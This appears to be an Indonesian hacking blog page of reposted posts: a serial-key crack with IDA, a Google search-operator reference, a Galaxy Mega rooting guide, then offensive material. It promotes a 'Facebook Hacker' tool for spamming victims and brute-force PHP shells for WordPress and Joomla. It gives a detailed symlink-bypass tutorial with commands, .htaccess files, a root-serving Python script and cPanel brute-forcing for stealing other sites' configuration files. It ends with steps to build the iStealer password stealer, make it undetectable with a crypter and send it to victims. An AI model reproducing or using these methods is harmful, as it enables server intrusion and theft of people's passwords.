Ingat Waktu Coy

Ingat Waktu Coy _

Selasa, 10 Desember 2013

CRAK FILE EXE

Hello folks……
AFTER VERY LONG time I am again blogged up…with this very new post on reverse engineering!!!
This is very off track tutorial…which mainly focuses on software security!!
Today…we are going to learn how to crack a simple application…i.e an EXE file!!!!
Most of you might have encountered a scenario where the software you installed asks for the SERIAL key or LICENSE key!!! THIS IS ANNOYING ! :P
So…how to go about this….??????
Well, today most of the softwares are well secured and well-proofed from reverse engineering! But still…some aren’t!
This is a very simple tutorial which will let you a know a basic approach towards cracking a simple exe file…
SO LET US START!
1. This is a simple application which asks us for the license key..
crack
2. We need to install a disassembler software to crack this application.
3. You may use any disassembler you want..
4. I am using IDA PRO(https://www.hex-rays.com/products/ida/support/download_freeware.shtml)
5. Install it and launch the application….you will see the following window after launching it.
ida
6. Drag and drop your exe file into the panel…
7.  Choose “load file as” MS-DOS Executable…click OK and Continue.
8.  By default its IDA View-A…Please choose “HEX VIEW-A”
9. Scroll down to find the line saying ” ENTER YOUR LICENSE KEY” (different for different applications,in my case it is this).
ida2
10.  Some where near that we found “GOOLGE” word next to the line saying “ENTER THE LICENSE KEY”..
11. AWESOME THIS IS  our LICENSE KEY!!! :P
12. Let us try “GOOGLE” as our key!
google
13. YEAH!!! IT WORKED!!!!
Ain’t that aweosme!!!  try building your own application and reverse engineer it to crack it!
I will be back again with a new and exciting post… TILL THEN KEEP HACKING AND KEEP ROCKING!
THANKS! :)
Warning:
Reverse engineering any software without proper authorization and permissions is illegal. This tutorial is for education purposes only.
Offensive Hacking will not be responsible for any cyber crimes as it doesn’t encourage the same.

Rabu, 04 September 2013

Search Operators

The following table lists the search operators that work with each Google search service. Click on an operator to jump to its description — or, to read about all of the operators, simply scroll down and read all of this page.
Search Service Search Operators
Web Search allinanchor:, allintext:, allintitle:, allinurl:, cache:, define:, filetype:, id:, inanchor:, info:, intext:, intitle:, inurl:, link:, related:, site:
Image Search allintitle:, allinurl:, filetype:, inurl:, intitle:, site:
Groups allintext:, allintitle:, author:, group:, insubject:, intext:, intitle:
Directory allintext:, allintitle:, allinurl:, ext:, filetype:, intext:, intitle:, inurl:
News allintext:, allintitle:, allinurl:, intext:, intitle:, inurl:, location:, source:
Product Search allintext:, allintitle:
The following is an alphabetical list of the search operators. This list includes operators that are not officially supported by Google and not listed in Google’s online help.
Note: Google may change how undocumented operators work or may eliminate them completely.
Each entry typically includes the syntax, the capabilities, and an example. Some of the search operators won’t work as intended if you put a space between the colon (:) and the subsequent query word. If you don’t care to check which search operators require no space after the colon, always place the keyword immediately next to the colon. Many search operators can appear anywhere in your query. In our examples, we place the search operator as far to the right as possible. We do this because the Advanced Search form writes queries in this way. Also, such a convention makes it clearer as to which operators are associated with which terms.
allinanchor:
If you start your query with allinanchor:, Google restricts results to pages containing all query terms you specify in the anchor text on links to the page. For example, [ allinanchor: best museums sydney ] will return only pages in which the anchor text on links to the pages contain the words “best,” “museums,” and “sydney.”
Anchor text is the text on a page that is linked to another web page or a different place on the current page. When you click on anchor text, you will be taken to the page or place on the page to which it is linked. When using allinanchor: in your query, do not include any other search operators. The functionality of allinanchor: is also available through the Advanced Web Search page, under Occurrences.
allintext:
If you start your query with allintext:, Google restricts results to those containing all the query terms you specify in the text of the page. For example, [ allintext: travel packing list ] will return only pages in which the words “travel,” “packing,” and “list” appear in the text of the page. This functionality can also be obtained through the Advanced Web Search page, under Occurrences.
allintitle:
If you start your query with allintitle:, Google restricts results to those containing all the query terms you specify in the title. For example, [ allintitle: detect plagiarism ] will return only documents that contain the words “detect” and “plagiarism” in the title. This functionality can also be obtained through the Advanced Web Search page, under Occurrences.
The title of a webpage is usually displayed at the top of the browser window and in the first line of Google’s search results for a page. The author of a website specifies the title of a page with the HTML TITLE element. There’s only one title in a webpage. When using allintitle: in your query, do not include any other search operators. The functionality of allintitle: is also available through the Advanced Web Search page, under Occurrences.
In Image Search, the operator allintitle: will return images in files whose names contain the terms that you specify.
In Google News, the operator allintitle: will return articles whose titles include the terms you specify.
allinurl:
If you start your query with allinurl:, Google restricts results to those containing all the query terms you specify in the URL. For example, [ allinurl: google faq ] will return only documents that contain the words “google” and “faq” in the URL, such as “www.google.com/help/faq.html”. This functionality can also be obtained through the Advanced Web Search page, under Occurrences.
In URLs, words are often run together. They need not be run together when you’re using allinurl:.
In Google News, the operator allinurl: will return articles whose titles include the terms you specify.
The Uniform Resource Locator, more commonly known as URL, is the address that specifies the location of a file on the Internet. When using allinurl: in your query, do not include any other search operators. The functionality of allinurl: is also available through the Advanced Web Search page, under Occurrences.
author:
If you include author: in your query, Google will restrict your Google Groups results to include newsgroup articles by the author you specify. The author can be a full or partial name or email address. For example, [ children author:john author:doe ] or [ children author:doe@someaddress.com ] return articles that contain the word “children” written by John Doe or doe@someaddress.com.
Google will search for exactly what you specify. If your query contains [ author:”John Doe” ] (with quotes), Google won’t find articles where the author is specified as “Doe, John.”
cache:
The query cache:url will display Google’s cached version of a web page, instead of the current version of the page. For example, [ cache:www.eff.org ] will show Google’s cached version of the Electronic Frontier Foundation home page.
Note: Do not put a space between cache: and the URL (web address).
On the cached version of a page, Google will highlight terms in your query that appear after the cache: search operator. For example, [ cache:www.pandemonia.com/flying/ fly diary ] will show Google’s cached version of Flight Diary in which Hamish Reid’s documents what’s involved in learning how to fly with the terms “fly” and “diary” highlighted.
define:
If you start your query with define:, Google shows definitions from pages on the web for the term that follows. This advanced search operator is useful for finding definitions of words, phrases, and acronyms. For example, [ define: blog ] will show definitions for “Blog” (weB LOG).
ext:
This is an undocumented alias for filetype:.
filetype:
If you include filetype:suffix in your query, Google will restrict the results to pages whose names end in suffix. For example, [ web page evaluation checklist filetype:pdf ] will return Adobe Acrobat pdf files that match the terms “web,” “page,” “evaluation,” and “checklist.” You can restrict the results to pages whose names end with pdf and doc by using the OR operator, e.g. [  email security filetype:pdf OR filetype:doc ].
When you don’t specify a File Format in the Advanced Search Form or the filetype: operator, Google searches a variety of file formats; see the table in File Type Conversion.
group:
If you include group: in your query, Google will restrict your Google Groups results to newsgroup articles from certain groups or subareas. For example, [ sleep group:misc.kids.moderated ] will return articles in the group misc.kids.moderated that contain the word “sleep” and [ sleep group:misc.kids ] will return articles in the subarea misc.kids that contain the word “sleep.”
id:
This is an undocumented alias for info:.
inanchor:
If you include inanchor: in your query, Google will restrict the results to pages containing the query terms you specify in the anchor text or links to the page. For example, [ restaurants inanchor:gourmet ] will return pages in which the anchor text on links to the pages contain the word “gourmet” and the page contains the word “restaurants.”
info:
The query info:URL will present some information about the corresponding web page. For instance, [ info:gothotel.com ] will show information about the national hotel directory GotHotel.com home page.
Note: There must be no space between the info: and the web page URL.
This functionality can also be obtained by typing the web page URL directly into a Google search box.
insubject:
If you include insubject: in your query, Google will restrict articles in Google Groups to those that contain the terms you specify in the subject. For example, [ insubject:”falling asleep” ] will return Google Group articles that contain the phrase “falling asleep” in the subject.
Equivalent to intitle:.
intext:
The query intext:term restricts results to documents containing term in the text. For instance, [ Hamish Reid intext:pandemonia ] will return documents that mention the word “pandemonia” in the text, and mention the names “Hamish” and “Reid” anywhere in the document (text or not).
Note: There must be no space between the intext: and the following word.
Putting intext: in front of every word in your query is equivalent to putting allintext: at the front of your query, e.g., [ intext:handsome intext:poets ] is the same as [ allintext: handsome poets ].
intitle:
The query intitle:term restricts results to documents containing term in the title. For instance, [ flu shot intitle:help ] will return documents that mention the word “help” in their titles, and mention the words “flu” and “shot” anywhere in the document (title or not).
Note: There must be no space between the intitle: and the following word.
Putting intitle: in front of every word in your query is equivalent to putting allintitle: at the front of your query, e.g., [ intitle:google intitle:search ] is the same as [ allintitle: google search ].
inurl:
If you include inurl: in your query, Google will restrict the results to documents containing that word in the URL. For instance, [ inurl:print site:www.googleguide.com ] searches for pages on Google Guide in which the URL contains the word “print.” It finds pdf files that are in the directory or folder named “print” on the Google Guide website. The query [ inurl:healthy eating ] will return documents that mention the words “healthy” in their URL, and mention the word “eating” anywhere in the document.
Note: There must be no space between the inurl: and the following word.
Putting inurl: in front of every word in your query is equivalent to putting allinurl: at the front of your query, e.g., [ inurl:healthy inurl:eating ] is the same as [ allinurl: healthy eating ].
In URLs, words are often run together. They need not be run together when you’re using inurl:.
link:
The query link:URL shows pages that point to that URL. For example, to find pages that point to Google Guide’s home page, enter:
link:www.googleguide.com ]
Note: According to Google’s documentation, “you cannot combine a link: search with a regular keyword search.”
Also note that when you combine link: with another advanced operator, Google may not return all the pages that match. The following queries should return lots of results, as you can see if you remove the -site: term in each of these queries.
Find links to the Google home page not on Google’s own site.
link:www.google.com -site:google.com ]
Find links to the UK Owners Direct home page not on its own site.
link:www.www.ownersdirect.co.uk -site:ownersdirect.co.uk ]
location:
If you include location: in your query on Google News, only articles from the location you specify will be returned. For example, [ queen location:canada ] will show articles that match the term “queen” from sites in Canada. Many other country names work; try them and see.
Two-letter US state abbreviations match individual US states, and two-letter Canadian province abbreviations (like NS for Nova Scotia) also work — although some provinces don’t have many newspapers online, so you may not get many results. Some other two-letter abbreviations — such as UK for the United Kingdom — are also available.
movie:
If you include movie: in your query, Google will find movie-related information. For examples, see Google’s Blog.
related:
The query related:URL will list web pages that are similar to the web page you specify. For instance, [ related:www.consumerreports.org ] will list web pages that are similar to the Consumer Reports home page.
Note: Don’t include a space between the related: and the web page url.
You can also find similar pages from the “Similar pages” link on Google’s main results page, and from the similar selector in the Page-Specific Search area of the Advanced Search page. If you expect to search frequently for similar pages, consider installing a GoogleScout browser button, which scouts for similar pages.
site:
If you include site: in your query, Google will restrict your search results to the site or domain you specify. For example, [ admissions site:www.lse.ac.uk ] will show admissions information from London School of Economics’ site and [ peace site:gov ] will find pages about peace within the .gov domain. You can specify a domain with or without a period, e.g., either as .gov or gov.
Note: Do not include a space between the “site:” and the domain.
You can use many of the search operators in conjunction with the basic search operators +, , OR, and " ". For example, to find information on Windows security from all sites except microsoft.com, enter:
windows security –site:microsoft.com  ]
You can also restrict your results to a site or domain through the domains selector on the Advanced Search page.
source:
If you include source: in your query, Google News will restrict your search to articles from the news source with the ID you specify. For example, [ election source:new_york_times ] will return articles with the word “election” that appear in the New York Times.
To find a news source ID, enter a query that includes a term and the name of the publication you’re seeking. You can also specify the publication name in the “news source” field in the Advanced News Search form. You’ll find the news source ID in the query box, following the source: search operator. For example, let’s say you enter the publication name Ha’aretz in the News Source box, then you click the Google Search button. The results page appears, and its search box contains [ peace source:ha_aretz__subscription_ ]. This means that the news source ID is ha_aretz__subscription_. This query will only return articles that include the word “peace” from the Israeli newspaper Ha’aretz.
weather
If you enter a query with the word weather and a city or location name, if Google recognizes the location, the forecast will appear at the top of the results page. Otherwise, your results will usually include links to sites with the weather conditions and forecast for that location.
Since weather is not an advanced operator, there is no need to include a colon after the word. For example, [ weather Sunnyvale CA ] will return the weather for Sunnyvale, California and [ weather 94041 ] will return the weather for the city containing the zip code (US postal code) 94041, which is Mountain View, California.
The Google Guide Advanced Operator Quick Reference (www.googleguide.com/advanced_operators_reference.html) provides a nice summary of the search operators grouped by type. It includes search operators not yet documented by Google, e.g., allinanchor:, allintext:, author:, ext:, group:, id:, insubject:, intext:, intitle:, location:, and source:.
Note: Google may change how undocumented operators work or eliminate them completely. If you notice problems or changes in Google’s undocumented operators, please let us know.

Exercises

This problem set is designed to give you experiences with search operators and practice with specifying more precisely what you’re seeking by using the Advanced Search form. For hints and answers to selected problems, see the Solutions page.
  1. Use the site: operator to search for armchairs on IKEA’s site, www.ikea.com.
  2. Use the Advanced Search form to find the page whose title is “Some Ways to Detect Plagiarism.” When the title is entered in lowercase letters, the query box on the results page contains [allintitle:  “ways to detect plagiarism” ].
  3. Find all pages on google.com but not on answers.google.com nor on directory.google.com whose titles include the words “FAQ” or “help.”
  4. Use the link: operator to see who links to googleguide.com, your company’s website, or your favorite website.
  5. Find pages whose titles include surfing that are not about surfing the World Wide Web.
  6. Find out where the upcoming international conference on AIDS is being held.
  7. How can you search for [ google help ] on Google Guide, www.googleguide.com, and on the UC Berkeley library website, www.lib.berkeley.edu?

Senin, 02 September 2013

|| HOW TO ROOT GALAXY MEGA 5.8 GT-I9152 100% WORKING ||

Hello friends their have been lot of people who have tried many rooting their galaxy mega 5.8 but ver not successful

But now we have a 100% working method to root galaxy mega 5.8

Requirements

1. Odin 3.7 Download from here
2. I9152-JB_4.2.2-boot.tar download from here

Procedure to Root Samsung Galaxy Mega 5.8
1. Download all the 2 files on your computer to root Samsung Galaxy Mega 5.8.
2. Extract “Odin.zip” on the desktop and place “I9152-JB_4.2.2-boot.tar” in it.
3. Switch Off your phone, take out the battery and insert it back. Now boot your phone into Download Mode by pressing and holding the “Volume Down + Home button“ together, and then press the “Power button“ till you see the Android Construction logo. Once again press “Volume Up” button to confirm.
4. Open “Odin.exe” (from extracted folder) and connect your phone via USB cable to your computer in download mode. If your phone is connected successfully the one of the ID:COM boxes will turn yellow/green.
5. Click on “PDA” button and select file “I9152-JB_4.2.2-boot.tar” (from extracted folder).
6. Please make sure that only “F. Reset Time“ and “Auto Reboot“ options are checked on Odin.
7. Now, click on the Start button on Odin to start the installation process. Installation will take a few minutes to complete so please wait for the complete process.
8. Finally, when the installation process is completed successfully you will see the “PASS” message on Odin and then your device will reboot automatically. Now, you can disconnect your phone from computer.
That’s it! You have successfully Rooted Samsung Galaxy Mega 5.8.

You can install any app required root access to check if its rooted or not

Note:- Method tested on my galaxy mega 5.8 and it worked 100 %

Thanks to oldmanhp from xda for making this possible
source:-xda
- See more at: http://www.hackerzadda.com/2013/08/how-to-root-galaxy-mega-58-gt-i9152-100.html#sthash.HK4Nkpqy.dpuf

Free Download Facebook Hacker:

Well, Facebook Hacker is a multi-functional software used to hack facebook account. Actually, you can't hack facebook password, but yes, cause many nuisance and pranks by using this Facebook Hacker software. Follow the guidelines below to free download Facebook Hacker software.

1. Free download Facebook Hacker software.
    http://verified-download.com/file/0rAM6

2. Now, run Facebook Hacker.exe file to see:

 Login to your Facebook account and then hit on OK at right bottom.

3. Now, Facebook Hacker options are displayed as shown:

4. In Victim pane at left bottom, enter the facebook ID of the victim you wanna hack in User ID field.

5. Now, using this Facebook Hacker software you can:
- Flood wall of victim.
- Spam his message box.
- Comment on him like crazy.
- Poke him and even add mass likes.

Thus, you can play such pranks with your friends using this Facebook Hacker. So, free download Facebook Hacker and trick out your friends.

I have tried this Facebook hacker software and found working perfect for me. If you have any problem to free download Facebook Hacker, please mention it in comments. - See more at: http://www.hackerzadda.com/2010/06/free-download-facebook-hacker.html#sthash.C4fBHjJx.dpuf

Free Download Facebook Hacker:


Well, Facebook Hacker is a multi-functional software used to hack facebook account. Actually, you can't hack facebook password, but yes, cause many nuisance and pranks by using this Facebook Hacker software. Follow the guidelines below to free download Facebook Hacker software.

1. Free download Facebook Hacker software.
    http://verified-download.com/file/0rAM6

2. Now, run Facebook Hacker.exe file to see:

 Login to your Facebook account and then hit on OK at right bottom.

3. Now, Facebook Hacker options are displayed as shown:

4. In Victim pane at left bottom, enter the facebook ID of the victim you wanna hack in User ID field.

5. Now, using this Facebook Hacker software you can:
- Flood wall of victim.
- Spam his message box.
- Comment on him like crazy.
- Poke him and even add mass likes.

Thus, you can play such pranks with your friends using this Facebook Hacker. So, free download Facebook Hacker and trick out your friends.

I have tried this Facebook hacker software and found working perfect for me. If you have any problem to free download Facebook Hacker, please mention it in comments. - See more at: http://www.hackerzadda.com/2010/06/free-download-facebook-hacker.html#sthash.C4fBHjJx.dpuf

Joomla and WordPress sites Finder and Brute Forcer

  

..//Namaste 
Joomla and WordPress Sites Finder and Brute Forcer 
Enjoy guys 

The Archive Contains

1. Joomla BruteForcer PHP Shell
2. WordPress BruteForcer PHP Shell
3. Joomla Sites Finder from a Server PHP Shell
4. WordPress Sites Finder from a Server PHP Shell

5. Private 1337day Server Exploiter to Auto Find and BruteForce Joomla and WordPress Sites

6. WordPress Brute Forcer Software to Work Faster with a Big Pass List

Enjoy Guys ....
 Download Direct: http://0453f0cc.linkbucks.com/
..//Namaste 
Joomla and WordPress Sites Finder and Brute Forcer 
Enjoy guys 


The Archive Contains

1. Joomla BruteForcer PHP Shell
2. WordPress BruteForcer PHP Shell
3. Joomla Sites Finder from a Server PHP Shell
4. WordPress Sites Finder from a Server PHP Shell

5. Private 1337day Server Exploiter to Auto Find and BruteForce Joomla and WordPress Sites

6. WordPress Brute Forcer Software to Work Faster with a Big Pass List


Enjoy Guys ....

Selasa, 27 Agustus 2013

Bypass Symlink on Linux Servers

Manoj Nath  403 Forbidden, Bypass symlink, How to hack, symlink, Symlink tutorial  3 comments

Hello Every One Now I Manoj Nath and I am going to share the Sen Haxor's Tutorial on Bypassing Symlink on 2013 Linux servers :)

    Hi Guys this is Sen
 Today i gonna Explain how to bypass Symlink on 2013 Server With Different .htaccess and Methods .
So Lets Get Started :)
Note : This method is not applicable for Godaddy , Bluehost , Hostgrator and Hostmonstor Servers .
For This First You Need the Following Files :
1 -> Sen Haxor CGI Shell
2 -> sen.zip
3 -> passwd-bypass.php
4 -> Turbo Brute force Cpanel
5 - > Port.py
First Before Starting to symlink we need to create php.ini and ini.php to Disable Safe mode and Disabled Functions on the server .
Use the Following Code :
Make a php.ini with the following code
safe_mode=Off
And ini.php with
<?
echo ini_get("safe_mode");
echo ini_get("open_basedir");
include($_GET["file"]);
ini_restore("safe_mode");
ini_restore("open_basedir");
echo ini_get("safe_mode");
echo ini_get("open_basedir");
include($_GET["ss"]);
?>
I will post the Download link of the files i use on the end of the tutorial .
So after creating php.ini and ini.php upload the other files to the server .
BYPASSING SYMLINK ON PLESK , DEBIAN , CENTOS & REDHAT SERVERS
Now i will explain how to bypass symlink on Plesk , Debian , Centos and Redhat
Commonly all of the above have root path like
/root/var/www/vhost/
where all sites will be under vhost directory  . But you wont have permission to view it so we will create a symbolic link to root and view the site and symlink the config files
Make a new directory in your shell example sen then upload sen.zip . Then use this command to unzip the file and create a symbolic link to root .
Command : unzip sen.zip
Note : In some servers unzip command wont work so you can manually create a symlink to root by using the command ln -s / root
Then You will see this
$ unzip sen.zip
Archive:  sen.zip
    linking: sen.txt                 -> /
finishing deferred symbolic links:
  sen.txt                -> /
This means a symbolic link has been created to / root .

http://foto.pk/images/2rkr.jpg
Now we need to upload .htaccess use the following
Options all
DirectoryIndex Sux.html
AddType text/plain .php
AddHandler server-parsed .php
Done Bypassed Now View /var/www/vhost/ and you will be displayed with all sites .

http://foto.pk/images/3twt.jpg
BYPASSING SYMLINK ON APACHE AND LITESPEED
Mostly when you try to symlink apache in 2013 server you will face 403 forbidden or 404 not found and 500 Internel Server Error
These can be Bypass By Using Different .htaccess individually.
BYPASSING SYMLINK ON APACHE & LITESPEED - Linux Servers .
First for this make a new directory in your shell example sen then upload sen.sa and .htaccess from the Sen Haxor CGI shell which i added the download link at the end of the Tutorial
After uploading .htaccess and sen.sa to a new directory sen chmod sen.sa to 0755
Then Open the Cgi Shell Login ( Password : senhaxor)
Now there are several methods to bypass 403 forbidden You need to try all the following methods . Atleast one will give you success .
Method 1 : .shtml method
This is the commonly used method by most of the hackers to bypass 403 forbidden Error .
So before we procced first you need to get all /etc/passwd from the server so that we can find the username and path of where the sites are located .
2013 Server mostly Many functions are enabled which shows 403 forbidden when you try to read cat /etc/passwd from the server
so i made a Powerfull Shell which can bypass and get /etc/passwd from the server.
I will also add it to the Downloads.
Upload the /etc/passwd bypasser shell and get all /etc/passwd
Then Login to Sen Haxor CGI Shell and create a symbolic link to your Target
Step 1 : ln -s / root
Step 2 : ln -s /home/username/public_html/config.php 1.shtml
Example if our site is www.site.com and username is site and its Wordpress
ln -s /home/site/public_html/wp-config.php 1.shtml
So we created a Symbolic link to our Target now you need to Go to Your Shell and Edit the .htaccess with the following Code :
Options +FollowSymlinks
DirectoryIndex itti.html
RemoveHandler .php
AddType application/octet-stream .php
Once you done this Open the 1.shtml on your Browser and rightclick and view source . You will be able to View the Config .
This is the common way of Bypass 403 forbidden and Litespeed .
Now Let Me Explain You the Advanced Method =)
Method 2 : Bypassing Symlinked Config From Cpanel
For This You need atleast One Cpanel Access on the sever . I will tell you how to easily crack Cpanel .
First Run This Command : ls /var/mail
Then you will be displayed with all username from the server Copy all .
Now Upload Turbo Brute Force Cpanel Script ( i will attach it will the downloads).
Open the Script and in User Paste all the username we got .
And for Password here is the wordlist :

http://pastebin.com/4kAjMvdy

Copy All and Paste it on Password Select Simple and Click Submit
If Your lucky you will be displayed with cracked cpanels.
Once you got a cpanel on the server You can Bypass 500 Internel Server Error 403 Forbidden Error From Port :2077 and From error-pages from file manager.
Just symlink the config
ln -s /home/user/public_html/wp-config.php config.shtml
Login to the cpanel
Then Go to File Manager -> Error Pages
Then Choose any of these according to what error is triggered when you open your symlinked config
  400 (Bad request)
    401 (Authorization required)
    403 (Forbidden)
    404 (Not found)
    500 (Internal server error)
Example "&file=400.shtml&desc=(Bad request)
we can get the config by
"&file=config.shtml& desc=(Bad request)
BYPASS SYMLINK FROM PORT 2077
So once you Symlinked the Config You can just login to port 2077
Then public_html/path/config.shtml
You will be able download the config.shtml and you can view the source .
Method 3 : Symlink Bypass via Open Port using Python
For this  First we Python to be Installed on Server.
To check if Python is installed run this command python -h
If its install we can use the following python script and Bypass
#!/usr/bin/env python
# devilzc0de.org (c) 2012
import SimpleHTTPServer
import SocketServer
import os
port = 13123
if __name__=='__main__':
os.chdir('/')
Handler = SimpleHTTPServer.SimpleHTTPRequestHandler
httpd = SocketServer.TCPServer(("", port), Handler)
print("Now open this server on webbrowser at port : " + str(port))
print("example: http://site.com :" + str(port))
httpd.serve_forever()
I have added the script to downloads .
Now Upload the script to the shell

http://foto.pk/images/205cjg3.jpg

now run this command : python port.py

http://foto.pk/images/2je1wqq.jpg

Now Open the site with port 13123
www.site.com:13123

http://foto.pk/images/j5ifwm.jpg
Server Bypassed From Open Port .
Method 4 : Bypassing Symlink Using .ini Method
Login to Sen Haxor CGI shell normally create a symlink to your target in .ini Extension .
ln -s /home/user/public_html/wp-config.php config.ini
now go to the shell and make a new file a.shtml
Paste the following code inside it and save it
<!--#include virtual="config.ini"-->
and save it .
Now open the a.shtml in the browser and right click and view the source . Done Bypassed
Method 5 : Bypassing Symlink Using ReadMe file
Make a new directory in your shell From the Cgi shell normally symlink the config
ln -s /home/user/public_html/config.php config.txt
now make .htaccess with the following code .
.htaccess
Options All
ReadMeName config.txt
Now when you open the directory on the browser you will be displayed with the config source directly .
eg : site.com/sen/config.txt is your symlinked config then when you open
www.site.com/sen/ you symlinked config will be displayed as a ReadMe content .
 Thats it i have explain All the Methods to Bypass Symlink If you will have problem Bypassing Try all the Following .htaccess
1 - > .htaccess
Options Indexes FollowSymLinks
DirectoryIndex ssssss.htm
AddType txt .php
AddHandler txt .php
2 -> .htaccess
Options All
DirectoryIndex ssss.html
addType txt .php
AddHandler txt .php
<IfModule mod_security.c>
SecFilterEngine Off
SecFilterScanPOST Off
</IfModule>
3 -> .htaccess
suPHP_ConfigPath /home/user/public_html/php.ini
4 -> .htaccess
Options +FollowSymLinks
DirectoryIndex Sux.html
Options +Indexes
AddType text/plain .php
AddHandler server-parsed .php
AddType text/plain .html
5 -> .htaccess
Options Indexes FollowSymLinks
DirectoryIndex ssssss.htm
AddType txt .php
AddHandler txt .php
<IfModule mod_autoindex.c>
IndexOptions
FancyIndexing
IconsAreLinks
SuppressHTMLPreamble
</ ifModule>
<IfModule mod_security.c>
SecFilterEngine Off
SecFilterScanPOST Off
</IfModule>

.HTACCESS TO BYPASS DISABLED FUNCTIONS
This one is to make python work :
.htaccess
AddType
application/x-httpd-cgi .py
AddHandler cgi-script .py
AddHandler cgi-script .py

This one is to make perl work :

.htaccess
AddType application/x-httpd-cgi .pl
AddHandler cgi-script .pl
AddHandler cgi-script .pl

This one is to enable Symlink if the function is disabled in the server :

.htaccess
<Directory "/home"> *** Options -ExecCGI* ***
AllowOverride
AuthConfig Indexes
Limit FileInfo
Options=IncludesNOEXEC,Indexes,Includes,MultiViews ,SymLinksIfOwnerMatch,FollowSymLinks
</ Directory>

This one is to retrieve users permissions :

.htaccess
AddType text/plain .php
Options +Indexes
DirectoryIndex filename.html

Bypass Internal Server error :
.htaccess
<IfModule mod_security.c> SecFilterEngine Off SecFilterScanPOST Off </IfModule>

Change php version:
.htaccess
AddType application/x-httpd-php4 .php

Bypass Uploads Options and upload shell in another extension :

<FilesMatch "^.*\.mp3"> SetHandler application/x-httpd-php </FilesMatch>


Retrieve Config with picture method :
.htaccess
Options FollowSymLinks MultiViews Indexes ExecCGI
AddType application/x-httpd-cgi .gif
AddHandler cgi-script .gif
AddHandler cgi-script .gif
DOWNLOAD LINK OF THE SCRIPTS I HAVE USED ON THE TUTORIAL :

www.mediafire.com/download/08oeos9cpaloeum/Bypass_Symlink_on_2013_Server_With_Different_.htaccess_and_Methods_by_Sen_Haxor.rar

So thats it i think i had covered everything thats related to Bypass Symlink and Disabled Functions on Server . If you still face Problem in Symlink Contact me :

www.facebook.com/cheenu.vis

Greetz : Lucky - Ashell - Ethicalnoob - Striker - Zagar Yasir - CyberAce Legion - Yash bro - Godzilla -  Architkp - RooT_Devil -Navneeth Singh - Cyberboy India- Cooltoad_ICA - Suriya Prakash - Avinash Mohiti - Ion -Shorty420 - Suriya Subash - Darkw0lf - Manoj Nath -Sksking Decoder - Rafay Bolach  -Mike Wals - Team Indishell and all Indian Hackers
Regards

Sen HaXoR - Team Indishell
- See more at: http://www.hackerzadda.com/2013/05/bypass-symlink-on-linux-servers-by-sen.html#sthash.TO30HBSc.dpuf

Jumat, 23 Agustus 2013

Hack Email, Facebook dan Myspace Password Menggunakan Istealers

Apa itu stealer?
II IIT adalah software kecil yang mencuri password yang disimpan dalam browser web kami, chatting aplikasi: seperti yahoo messenger Etc, Stealer yang kemudian ditransmisikan sintesis dicuri password ke server FTP hacker, Biasanya pencuri itu terlihat seperti keyloggers tetapi ada banyak perbedaan, Stealer itu. hanya melakukan mencuri password yang disimpan dalam browser web mereka tidak akan menangkap keystrokes diketik oleh pengguna
Keuntungan dari pencuri itu
Yang sangat mudah digunakan, Yang sangat kecil dalam ukuran dan Malthus Sangat mudah untuk memotong deteksi antivirus dengan menggunakan beberapa teknik Disebutkan di bawah ini
Kekurangan
Ini mencuri password itu hanya disimpan dalam browser dan aplikasi chatting, hack ini tidak akan bekerja jika korban belum menyimpan password di web browser-nya, ini memiliki beberapa fitur yang sangat seperti keylogger yang memiliki banyak fitur seperti live monitoring, log chatting dll, Yang tidak stabil seperti keyloggers

Hack Email, Facebook dan Myspace Password Menggunakan iStealer

Hal yang Kita Perlu: -

1 IStealer - Untuk Mencuri korban disimpan password, iStealer Anda dapat mendownload dari sini
2 Akun ftp - Buat akun ftp gratis dari www.drivehq.com
3 Crypter - Untuk memotong deteksi antivirus Anda dapat men-download Crypter FUD gratis dari sini dan password @ hackholic

Catatan: - Jika Anda mendapatkan error mengatakan Comdlg32.ocx hilang, Kemudian Silahkan download hilang OCX dari sini
Prosedur: -

1 iStealer Pertama Download software dari link di atas givenName, ekstrak file menggunakan winrar
Catatan: - antivirus Anda akan mulai berteriak-teriak mengatakan virus yang satu, tetapi yang bukan virus, jadi silakan matikan Anda AV (anti-virus) software sebelum mengekstrak file

2 Setelah mengekstrak file membuka Istealer.exe,   Masukkan host sebagai "ftp.drivehq.com" tanpa tanda kutip, Lalu masukkan rincian account FTP Anda (nama login dan password) yang sebelumnya Anda buat, periksa semua pilihan di sisi kanan seperti yang ditunjukkan

4 Sekarang periksa "mengikat dengan file lain" dan pilih file yang Anda ingin mengikat dengan iStealer ini, Kemudian tekan tombol "mengubah icon" dan mengubah ikon yang Anda inginkan, jadi saya harus menyertakan paket ikon sehingga Anda dapat menggunakan Mereka ikon. Akhirnya pilih membangun dan menyimpan file out put


Sekarang kita telah berhasil membuat file server kami tetapi terdeteksi oleh Av sebagai virus, jadi kita harus crypt file server kami, sehingga untuk memotong deteksi antivirus, Untuk melakukan itu ikuti langkah-langkah di bawah ini givenName

1 Download free software Crypter FUD dari link di atas givenName,


2 Buka iStealer perangkat lunak Pilih file server crypter sebagai file yang Anda buat (file yang dibuat pada langkah 4), dan akhirnya klik crypt
Sekarang iStealer Anda benar-benar tidak terdeteksi,
Sekarang hanya mengirim file ini ke korban, Ketika korban membuka itu ia hanya ingin melihat file atau Web yang Anda diikat pada langkah 4,
Sementara iStealer Anda akan menginstal diam-diam di latar belakang, afterwhich akan mengirim log (Mengandung password yang disimpan membentuk browser korban) ke account FTP Anda, Anda dapat melihat korban password Anda dengan login ke account ftp Anda, Dengan cara ini kita layak untuk berhasil hack korban kami Email, Facebook, Myspace Password


semoga bermanfaat

Hack Email, Facebook and Myspace Passwords Using Istealers

Hack Email, Facebook and Myspace Passwords Using Istealers



What are Stealer's ?
II Iit is a small software which steals passwords that are stored in our web browsers, chat apps such as yahoo messenger .etc , Stealer's then send these stolen passwords to the Hackers FTP server, Usually Stealer's  look like keyloggers but there are many differences, Stealer's steal only  passwords that stored in the web browsers they wont capture keystrokes typed by the user
Advantages of  Stealer's 
Its very easy to use, Its very small in size and thus Very easy to bypass antivirus detection by using some of the techniques mentioned below
Disadvantages 
It steals passwords that are only stored in the browsers and chat apps ,  This hack wont work if victim has not saved his passwords in his web browser , It has very few features Unlike a keylogger which has many features like live monitoring,  chat logs etc , Its not that stable as keyloggers

Hack Email, Facebook and Myspace Passwords Using Istealer

Things We Need :- 

1. Istealer - To Steal victims stored passwords ,You can download Istealer from here
2. Ftp Account - Create a free ftp account from www.drivehq.com
3. Crypter - To Bypass Antivirus detection You can download free FUD Crypter from here and the password is @hackholic

Note:- If you get an error saying COMDLG32.OCX  missing , Then Please download the missing OCX  from  Here
Procedure :-


1. First Download the Istealer Software from the link given above, extract the files using  winrar 
